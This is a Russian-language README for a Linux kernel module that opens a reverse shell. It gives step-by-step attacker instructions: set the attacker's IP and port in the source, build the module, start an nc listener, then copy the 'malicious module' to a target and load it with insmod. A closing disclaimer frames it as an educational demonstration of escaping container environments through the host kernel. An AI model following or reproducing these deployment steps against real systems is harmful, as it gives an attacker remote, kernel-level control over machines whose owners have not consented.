42 lines
2.3 KiB
Markdown
42 lines
2.3 KiB
Markdown
# LKM Reverse Shell
|
||
|
||
В этом репозитории представлен модуль ядра Linux, который выполняет обратный вызов на прослушиватель для установки обратной оболочки
|
||
|
||
|
||
### Инструкция по использованию
|
||
|
||
Для успешной эксплуатации необходимо подготовить инструментарий для сборки модулей ядра на атакующей машине. Установите пакет build-essential и заголовки ядра:
|
||
|
||
```bash
|
||
sudo apt install build-essential linux-headers-$(uname -r)
|
||
```
|
||
|
||
После клонирования репозитория, откройте файл `reverse-shell.c` и измените 13 строку, указав ваш IP-адрес и порт. Затем соберите модуль:
|
||
|
||
```bash
|
||
git clone https://git.vadimbelous.com/vadim_belous/lkm_reverse_shell.git
|
||
cd lkm_reverse_shell
|
||
$EDITOR reverse-shell.c
|
||
make
|
||
```
|
||
|
||
Получившийся в результате успешной сборки файл `reverse-shell.ko` это и есть нужный модуль ядра
|
||
|
||
Запустите прослушиватель на машине атакующего:
|
||
|
||
```bash
|
||
nc -lvnp $PORT
|
||
```
|
||
|
||
Перенесите вредоносный модуль на целевую машину и подгрузите его в ядро:
|
||
|
||
```bash
|
||
insmod reverse-shell.ko
|
||
```
|
||
|
||
Если вы всё сделали правильно, на прослушиватель придёт обратный вызов и установится обратная командная оболочка
|
||
|
||
### Disclaimer
|
||
|
||
Этот репозиторий создан исключительно в образовательных целях, чтобы продемонстрировать потенциальные методы эксплуатации контейнерных сред путем загрузки вредоносного модуля (LKM) в ядро хостовой ОС. Автор данного репозитория не несет ответственности за любые неправомерные действия, совершенные с использованием этого кода
|